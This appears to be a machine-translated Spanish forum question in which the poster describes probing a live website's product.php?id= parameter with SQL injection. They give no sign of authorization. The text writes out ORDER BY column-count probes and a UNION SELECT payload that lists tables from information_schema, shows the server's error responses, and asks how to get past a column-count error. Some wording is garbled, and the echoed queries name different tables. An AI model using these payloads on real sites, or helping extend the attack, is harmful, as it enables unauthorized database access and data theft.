Una pregunta de inyección de SQL muy básica aquí, encontré un SQLi en un sitio web de mysql con product.php?id=200
.
Primero me cansé de ORDENAR POR para calcular el número de columna de esa tabla por product.php?id=200 order by 13
que resulta ser de 12 columnas, el error muestra que el pedido de 13 es
Error: SELECT * FROM 'category' WHERE is_active='1' AND id =200 order by 13
Unknown column '13' in 'order clause'
Todo se ve bien, así que intenté averiguar los nombres de las tablas a continuación,
product.php?id=200 union select table_name,2,3,4,5,6,7,8,9,10,11,12 from
information_schema.tables
y se muestra
Error: SELECT * FROM 'products' WHERE is_active='1' AND id =200 union select
table_name,2,3,4,5,6,7,8,9,10,11,12 from information_schema.tables
The used SELECT statements have a different number of columns
Independientemente de la cantidad de números que puse en la consulta de selección, siempre muestra el mismo error, asumo que hay algunas actividades dinámicas en el backend, pero no estoy seguro de qué, y cómo debo proceder, cualquier sugerencia, por favor ? ¡Gracias!